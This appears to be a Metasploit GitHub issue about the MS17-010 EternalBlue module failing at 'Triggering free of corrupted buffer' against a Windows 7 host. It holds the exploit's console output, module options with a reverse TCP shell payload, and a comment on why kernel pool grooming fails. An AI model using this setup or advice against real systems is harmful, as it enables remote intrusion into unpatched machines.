Metasploit-framework: MS17-010 ETERNALBLUE overwrite completed successfully- stuck at Triggering free of corrupted buffer
```
[+] 10.20..:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate N 7600 x86 (32-bit)
[] 10.20..:445 - Connecting to target for exploitation.
[+] 10.20..:445 - Connection established for exploitation.
[+] 10.20..:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.20..:445 - CORE raw buffer dump (25 bytes)
[] 10.20..:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[] 10.20..:445 - 0x00000010 74 65 20 4e 20 37 36 30 30 te N 7600
[+] 10.20..:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.20..:445 - Trying exploit with 12 Groom Allocations.
[] 10.20..:445 - Sending all but last fragment of exploit packet
[] 10.20..:445 - Starting non-paged pool grooming
[+] 10.20..:445 - Sending SMBv2 buffers
[+] 10.20..:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 10.20..:445 - Sending final SMBv2 buffers.
[] 10.20..:445 - Sending last fragment of exploit packet!
[] 10.20..:445 - Receiving response from exploit packet
[+] 10.20..:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 10.20..:445 - Sending egg to corrupted connection.
[] 10.20..:445 - Triggering free of corrupted buffer.
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.20..:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
````
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.20.. yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.20.. yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Expected behavior
Expected meterpreter session opened.
What happens instead?
Exploit stuck at Triggering free of corrupted buffer. FAIL
Metasploit version
Framework: 5.0.27-dev
Console : 5.0.27-dev
I installed Metasploit with:
- [ ] Kali package via apt
What OS are you running Metasploit on?
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2019.2
beish
>All comments
Sometimes the eblue groom simply doesn't work due to network latency or the volatile nature of kernel allocations. The FuzzBunch exploit also fails like this. That you received 0xC000000D is a good sign though, means you didn't overwrite a region immediately BSoD-sensitive/nonexistent.
zerosum0x0
on 20 Jun 2019
Related issues
Acidical
路
3Comments
bcoles
路
3Comments
Sonya2010
路
3Comments
Funeoz
路
3Comments
wvu-r7
路
3Comments
Most helpful comment
Sometimes the eblue groom simply doesn't work due to network latency or the volatile nature of kernel allocations. The FuzzBunch exploit also fails like this. That you received 0xC000000D is a good sign though, means you didn't overwrite a region immediately BSoD-sensitive/nonexistent.